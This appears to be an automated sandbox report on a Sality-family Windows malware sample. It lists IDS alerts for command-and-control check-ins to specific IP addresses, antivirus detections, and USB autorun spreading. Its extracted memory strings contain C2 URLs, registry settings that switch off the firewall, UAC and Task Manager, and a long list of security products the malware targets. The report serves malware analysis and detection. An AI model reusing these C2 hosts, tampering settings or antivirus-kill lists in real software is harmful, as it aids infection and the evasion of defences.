        2024-10-18T12:45:17.699821+020020183401Malware Command and Control Activity Detected192.168.2.950057185.53.178.5080TCP
        2024-10-18T12:45:21.957273+020020183401Malware Command and Control Activity Detected192.168.2.950058190.120.227.918080TCP
        2024-10-18T12:45:23.641333+020020183401Malware Command and Control Activity Detected192.168.2.950059185.53.178.5080TCP
        2024-10-18T12:45:27.761668+020020183401Malware Command and Control Activity Detected192.168.2.950060190.120.227.918080TCP
        2024-10-18T12:45:29.317116+020020183401Malware Command and Control Activity Detected192.168.2.950061185.53.178.5080TCP
        2024-10-18T12:45:33.753048+020020183401Malware Command and Control Activity Detected192.168.2.950062190.120.227.918080TCP
        2024-10-18T12:45:36.073156+020020183401Malware Command and Control Activity Detected192.168.2.950064185.53.178.5080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-18T12:41:34.975221+020028032702Potentially Bad Traffic192.168.2.949707185.53.178.5080TCP
        2024-10-18T12:41:39.935484+020028032702Potentially Bad Traffic192.168.2.949709190.120.227.918080TCP
        2024-10-18T12:41:41.407737+020028032702Potentially Bad Traffic192.168.2.949712185.53.178.5080TCP
        2024-10-18T12:41:49.368405+020028032702Potentially Bad Traffic192.168.2.949716185.53.178.5080TCP
        2024-10-18T12:41:53.402228+020028032702Potentially Bad Traffic192.168.2.949719190.120.227.918080TCP
        2024-10-18T12:41:55.419204+020028032702Potentially Bad Traffic192.168.2.949721185.53.178.5080TCP
        2024-10-18T12:41:59.701403+020028032702Potentially Bad Traffic192.168.2.949722190.120.227.918080TCP
        2024-10-18T12:42:01.531631+020028032702Potentially Bad Traffic192.168.2.949723185.53.178.5080TCP
        2024-10-18T12:42:06.031031+020028032702Potentially Bad Traffic192.168.2.949724190.120.227.918080TCP
        2024-10-18T12:42:07.602990+020028032702Potentially Bad Traffic192.168.2.949725185.53.178.5080TCP
        2024-10-18T12:42:11.645323+020028032702Potentially Bad Traffic192.168.2.949726190.120.227.918080TCP
        2024-10-18T12:42:13.239676+020028032702Potentially Bad Traffic192.168.2.949727185.53.178.5080TCP
        2024-10-18T12:42:17.298575+020028032702Potentially Bad Traffic192.168.2.949728190.120.227.918080TCP
        2024-10-18T12:42:18.602435+020028032702Potentially Bad Traffic192.168.2.949729185.53.178.5080TCP
        2024-10-18T12:42:22.644756+020028032702Potentially Bad Traffic192.168.2.949730190.120.227.918080TCP
        2024-10-18T12:42:24.726632+020028032702Potentially Bad Traffic192.168.2.949731185.53.178.5080TCP
        2024-10-18T12:42:28.989555+020028032702Potentially Bad Traffic192.168.2.949732190.120.227.918080TCP
        2024-10-18T12:42:30.465354+020028032702Potentially Bad Traffic192.168.2.949735185.53.178.5080TCP
        2024-10-18T12:42:34.518806+020028032702Potentially Bad Traffic192.168.2.949736190.120.227.918080TCP
        2024-10-18T12:42:36.979019+020028032702Potentially Bad Traffic192.168.2.949737185.53.178.5080TCP
        2024-10-18T12:42:41.055615+020028032702Potentially Bad Traffic192.168.2.949738190.120.227.918080TCP
        2024-10-18T12:42:42.705591+020028032702Potentially Bad Traffic192.168.2.949740185.53.178.5080TCP
        2024-10-18T12:42:47.487267+020028032702Potentially Bad Traffic192.168.2.949741190.120.227.918080TCP
        2024-10-18T12:42:49.865347+020028032702Potentially Bad Traffic192.168.2.949759185.53.178.5080TCP
        2024-10-18T12:42:54.346733+020028032702Potentially Bad Traffic192.168.2.949767190.120.227.918080TCP
        2024-10-18T12:42:56.008076+020028032702Potentially Bad Traffic192.168.2.949784185.53.178.5080TCP
        2024-10-18T12:43:00.351728+020028032702Potentially Bad Traffic192.168.2.949789190.120.227.918080TCP
        2024-10-18T12:43:01.755354+020028032702Potentially Bad Traffic192.168.2.949806185.53.178.5080TCP
        2024-10-18T12:43:05.816068+020028032702Potentially Bad Traffic192.168.2.949814190.120.227.918080TCP
        2024-10-18T12:43:07.131282+020028032702Potentially Bad Traffic192.168.2.949835185.53.178.5080TCP
        2024-10-18T12:43:11.408873+020028032702Potentially Bad Traffic192.168.2.949842190.120.227.918080TCP
        2024-10-18T12:43:12.995616+020028032702Potentially Bad Traffic192.168.2.949861185.53.178.5080TCP
        2024-10-18T12:43:17.555326+020028032702Potentially Bad Traffic192.168.2.949870190.120.227.918080TCP
        2024-10-18T12:43:19.906299+020028032702Potentially Bad Traffic192.168.2.949889185.53.178.5080TCP
        2024-10-18T12:43:23.986856+020028032702Potentially Bad Traffic192.168.2.949899190.120.227.918080TCP
        2024-10-18T12:43:25.649318+020028032702Potentially Bad Traffic192.168.2.949918185.53.178.5080TCP
        2024-10-18T12:43:31.472599+020028032702Potentially Bad Traffic192.168.2.949927190.120.227.918080TCP
        2024-10-18T12:43:33.227599+020028032702Potentially Bad Traffic192.168.2.949949185.53.178.5080TCP
        2024-10-18T12:43:37.472929+020028032702Potentially Bad Traffic192.168.2.949955190.120.227.918080TCP
        2024-10-18T12:43:39.087157+020028032702Potentially Bad Traffic192.168.2.949977185.53.178.5080TCP
        2024-10-18T12:43:43.404850+020028032702Potentially Bad Traffic192.168.2.949983190.120.227.918080TCP
        2024-10-18T12:43:45.144872+020028032702Potentially Bad Traffic192.168.2.950001185.53.178.5080TCP
        2024-10-18T12:43:49.504205+020028032702Potentially Bad Traffic192.168.2.950007190.120.227.918080TCP
        2024-10-18T12:43:51.117597+020028032702Potentially Bad Traffic192.168.2.950027185.53.178.5080TCP
        2024-10-18T12:43:55.528705+020028032702Potentially Bad Traffic192.168.2.950028190.120.227.918080TCP
        2024-10-18T12:43:57.133083+020028032702Potentially Bad Traffic192.168.2.950029185.53.178.5080TCP
        2024-10-18T12:44:01.393948+020028032702Potentially Bad Traffic192.168.2.950030190.120.227.918080TCP
        2024-10-18T12:44:03.034471+020028032702Potentially Bad Traffic192.168.2.950032185.53.178.5080TCP
        2024-10-18T12:44:07.519217+020028032702Potentially Bad Traffic192.168.2.950033190.120.227.918080TCP
        2024-10-18T12:44:09.073539+020028032702Potentially Bad Traffic192.168.2.950034185.53.178.5080TCP
        2024-10-18T12:44:13.364041+020028032702Potentially Bad Traffic192.168.2.950035190.120.227.918080TCP
        2024-10-18T12:44:14.966939+020028032702Potentially Bad Traffic192.168.2.950036185.53.178.5080TCP
        2024-10-18T12:44:19.380085+020028032702Potentially Bad Traffic192.168.2.950037190.120.227.918080TCP
        2024-10-18T12:44:20.972483+020028032702Potentially Bad Traffic192.168.2.950038185.53.178.5080TCP
        2024-10-18T12:44:25.769055+020028032702Potentially Bad Traffic192.168.2.950039190.120.227.918080TCP
        2024-10-18T12:44:27.259821+020028032702Potentially Bad Traffic192.168.2.950040185.53.178.5080TCP
        2024-10-18T12:44:32.108634+020028032702Potentially Bad Traffic192.168.2.950041190.120.227.918080TCP
        2024-10-18T12:44:34.003474+020028032702Potentially Bad Traffic192.168.2.950042185.53.178.5080TCP
        2024-10-18T12:44:38.544056+020028032702Potentially Bad Traffic192.168.2.950043190.120.227.918080TCP
        2024-10-18T12:44:40.244422+020028032702Potentially Bad Traffic192.168.2.950044185.53.178.5080TCP
        2024-10-18T12:44:44.568350+020028032702Potentially Bad Traffic192.168.2.950045190.120.227.918080TCP
        2024-10-18T12:44:47.270315+020028032702Potentially Bad Traffic192.168.2.950046185.53.178.5080TCP
        2024-10-18T12:44:51.551466+020028032702Potentially Bad Traffic192.168.2.950048190.120.227.918080TCP
        2024-10-18T12:44:53.223461+020028032702Potentially Bad Traffic192.168.2.950049185.53.178.5080TCP
        2024-10-18T12:44:57.651692+020028032702Potentially Bad Traffic192.168.2.950050190.120.227.918080TCP
        2024-10-18T12:44:59.153333+020028032702Potentially Bad Traffic192.168.2.950051185.53.178.5080TCP
        2024-10-18T12:45:03.284445+020028032702Potentially Bad Traffic192.168.2.950052190.120.227.918080TCP
        2024-10-18T12:45:04.962592+020028032702Potentially Bad Traffic192.168.2.950053185.53.178.5080TCP
        2024-10-18T12:45:09.512490+020028032702Potentially Bad Traffic192.168.2.950054190.120.227.918080TCP
        2024-10-18T12:45:11.224026+020028032702Potentially Bad Traffic192.168.2.950055185.53.178.5080TCP
        2024-10-18T12:45:15.957815+020028032702Potentially Bad Traffic192.168.2.950056190.120.227.918080TCP
        2024-10-18T12:45:17.699821+020028032702Potentially Bad Traffic192.168.2.950057185.53.178.5080TCP
        2024-10-18T12:45:21.957273+020028032702Potentially Bad Traffic192.168.2.950058190.120.227.918080TCP
        2024-10-18T12:45:23.641333+020028032702Potentially Bad Traffic192.168.2.950059185.53.178.5080TCP
        2024-10-18T12:45:27.761668+020028032702Potentially Bad Traffic192.168.2.950060190.120.227.918080TCP
        2024-10-18T12:45:29.317116+020028032702Potentially Bad Traffic192.168.2.950061185.53.178.5080TCP
        2024-10-18T12:45:33.753048+020028032702Potentially Bad Traffic192.168.2.950062190.120.227.918080TCP
        2024-10-18T12:45:36.073156+020028032702Potentially Bad Traffic192.168.2.950064185.53.178.5080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-18T12:42:31.392262+020028161651Malware Command and Control Activity Detected192.168.2.949733194.5.152.21580TCP
        2024-10-18T12:43:18.923435+020028161651Malware Command and Control Activity Detected192.168.2.949867194.5.152.21580TCP
        2024-10-18T12:44:05.202534+020028161651Malware Command and Control Activity Detected192.168.2.950031194.5.152.21580TCP
        2024-10-18T12:44:53.017759+020028161651Malware Command and Control Activity Detected192.168.2.950047194.5.152.21580TCP
        2024-10-18T12:45:38.986659+020028161651Malware Command and Control Activity Detected192.168.2.950063194.5.152.21580TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeAvira: detected
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\winfpnht.exeAvira: detection malicious, Label: W32/Sality.AT
        Source: C:\Users\user\AppData\Local\Temp\rckc.exeAvira: detection malicious, Label: W32/Sality.AT
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeReversingLabs: Detection: 94%
        Multi AV Scanner detection for submitted file
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeReversingLabs: Detection: 94%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\winfpnht.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\rckc.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040655C wcslen,CryptBinaryToStringW,18_2_0040655C
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sedSmibSjDOiaD.exe, 0000002E.00000000.3877127117.0000000000A9E000.00000002.00000001.01000000.0000000A.sdmp

        Spreading

        barindex
        Yara detected Sality
        Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe PID: 1376, type: MEMORYSTR
        Creates autorun.inf (USB autostart)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\autorun.infJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile opened: e:Jump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeFile opened: c:Jump to behavior
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeBinary or memory string: [AutoRun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeBinary or memory string: autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.000000000094F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\autorun.inf3
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\autorun.infP3
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714592262.000000000515C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns6MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_7728SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMB.loghttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRA
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infG
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infT+
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infx?
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infO
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infY
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf3
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infO
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infY
        Source: jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf<
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infG
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infk.
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.infx?
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf<
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf3
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01441060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,1_2_01441060
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_0143A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,1_2_0143A2F5

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49730 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49730 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49719 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49719 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49736 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49736 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49729 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49725 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49737 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49707 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49712 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49806 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49731 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:49733 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49738 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49738 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49728 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49728 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49732 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49767 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49767 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49814 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49784 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49759 -> 185.53.178.50:80
